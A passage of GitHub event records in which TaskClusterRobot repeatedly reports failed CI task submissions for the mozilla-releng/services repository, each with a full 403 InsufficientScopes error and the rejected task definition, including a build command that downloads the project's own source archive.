\"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"evBQcN31TMmEQ35d7ImMGA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.727Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"evBQcN31TMmEQ35d7ImMGA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.727Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"evBQcN31TMmEQ35d7ImMGA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"15b42d2b28726354aa91a44d09e63fcadee3cbaf\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.537Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.537Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PRaBZB-XQuyLR-sqgWhpwg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.537Z\"\n                },\n                \"time\": \"2016-09-23T13:09:59.727Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T13:09:59Z"}
{"id":"4608448941","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145908,"position":null,"line":null,"path":null,"commit_id":"ddcbdbb99491947b6efdcebed5392debf43921f2","created_at":"2016-09-23T13:10:00Z","updated_at":"2016-09-23T13:10:00Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"drDSs51bRdmrWx5kV25loQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.319Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.319Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.319Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.460Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"drDSs51bRdmrWx5kV25loQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.319Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.319Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.319Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.460Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"drDSs51bRdmrWx5kV25loQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.319Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.319Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"KlSSpq8IS6uTkhyZQ7zKLg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.319Z\"\n                },\n                \"time\": \"2016-09-23T13:10:00.460Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VuswG5NOSAmEyJlk05WfNg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": 